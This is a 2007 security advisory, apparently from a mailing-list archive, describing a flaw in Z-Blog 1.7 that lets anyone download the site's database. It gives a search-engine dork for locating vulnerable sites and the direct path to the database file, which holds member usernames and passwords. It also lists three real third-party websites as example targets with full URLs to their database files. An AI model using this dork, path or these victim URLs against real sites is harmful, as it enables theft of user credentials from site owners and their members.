Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Full Path Disclosure in SendCard

Prototype of an PHP application ===> RFI

static XSS / SQL-Injection in Omegasoft Insel

PBSite - PHP Bulletin Site | CMS ====> RFI

From:	RaeD Hasadya <raed_(at)_bsdmail.com>
Date:	01.06.2007
Subject:	Z-Blog 1.7 Authentication Bypass Database Download Vulnerability

* Author  : Hasadya Raed
* Contact : RaeD@BsdMail.Com ~>Israel Hacker
* Greetz  : Fairoz :)
* Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
* Script   : Z-Blog 1.7            
* Impact   : Remote
* Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
* Download   : http://bbs.rainbowsoft.org/attachment.php?aid=92


--/ REPRODUCE \--

# Attackers Can Authentication Bypass In This Product By Add The Following Files:
 ('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
 The Users Names And Passwords Inside

--/ Examples \--

http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb